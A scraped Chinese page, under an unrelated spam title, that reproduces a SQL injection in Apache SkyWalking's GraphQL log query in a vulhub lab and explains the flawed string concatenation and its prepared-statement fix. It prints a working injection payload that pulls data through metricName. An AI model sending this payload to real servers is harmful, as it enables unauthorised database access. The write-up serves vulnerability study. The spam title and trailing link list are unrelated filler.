当前位置: 首页 > news >正文

互联网专线做网站怎么做数据陕西城乡住房建设厅网站

互联网专线做网站怎么做数据,陕西城乡住房建设厅网站,wordpress 淘宝客 百度云,wordpress 说说漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时#xff0c;通过GraphQL协议查询元数据时#xff0c;存在SQL注入漏洞#xff0c;该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参…漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时通过GraphQL协议查询元数据时存在SQL注入漏洞该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 环境搭建 拉取vulhub git clone https://github.com/vulhub/vulhub.git搭建镜像 cd /vulhub/skywalking/8.3.0-sqli docker-compose up -d访问8080端口 漏洞复现 在首页刷新即可抓到报文。 输入payload {query:query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}} } ,variables:{condition:{metricName:INFORMATION_SCHEMA.USERS union all select h2version())a where 1? or 1? or 1? --,endpointId:1,traceId:1,state:ALL,stateCode:1,paging:{pageSize:10}}} }查看返回结果 漏洞复现成功 漏洞原理 源码https://github.com/apache/skywalking/releases/tag/v8.3.0 graphql是skywalking的一种查询协议如果请求以下列JSON给出 {bookById(id: book-1){idnamepageCountauthor {firstNamelastName}} }则返回结果为 {bookById: {id:book-1,name:Harry Potter and the Philosophers Stone,pageCount:223,author: {firstName:Joanne,lastName:Rowling}} }通常graphql中会对对象类型进行定义 type Query {bookById(id: ID): Book }type Book {id: IDname: StringpageCount: Intauthor: Author }type Author {id: IDfirstName: StringlastName: String }此次产生漏洞的queryLogs为 oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls: (这里不知道为什么下载的源码中没有只能跑到github上看 oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java 采取了直接拼接的方式。 5、修复方法 修复后使用了占位符即预编译。
http://wiki.neutronadmin.com/news/154858/

相关文章:

  • jsp可以做网站首页吗网络游戏陪玩
  • 南平网站设计网站开发和桌面开发哪个难
  • 2003访问网站提示输入用户名密码番禺网站建设优化推广
  • 百度上开个网站怎么做中国做网站最好的
  • 四川大学毕业设计网站小型教育网站的开发建设开题报告
  • 网站建设参考论文常用的网络营销推广方法有哪些
  • 如何维护企业电子商务网站建设响应式网站手机端尺寸
  • 学院网站建设的目的及定位东莞哪里有网站制作公司
  • 重庆企业网站建设哪家好网络营销网站建设存在问题
  • 上饶做网站最好的公司做网站的品牌公司
  • 玉林建设工程信息网站天津网络推广公司
  • 如何建网络营销网站上交所大宗交易平台
  • 做网站第一次见客户百度指数关键词未收录怎么办
  • 点击最多的网站h5模板免费
  • 泾川网站建设创意广告图片及文字解析
  • 网站建设添加音乐的代码网站主页模板图片
  • 宿迁网站建设排名wordpress创建表单
  • 负责网站开发的岗位服务好 售后好的网站建设
  • 宿迁哪里有做网站开发的网站成本案例
  • 做网站都需要准备什么软件社交网站开发
  • 建站吗官方网站html 网站添加悬浮二维码
  • 网站虚拟主机里的内容强制删除正规排名网站推广公司
  • 安徽城乡建设厅官网站wordpress网址插件
  • 学php网站开发多钱免费中文wordpress主题下载
  • 北京网站制作培训班如何用魔方网表做门户网站
  • 海南网站建设网站开发网站开发广东
  • 个人怎么建设图书网站网站开发成本预算价目表
  • 作弊网站河南企业网站排名优化价格
  • 怎么做网站平台教程网页布局类型
  • 农业大学网站建设特点做网站用哪些语言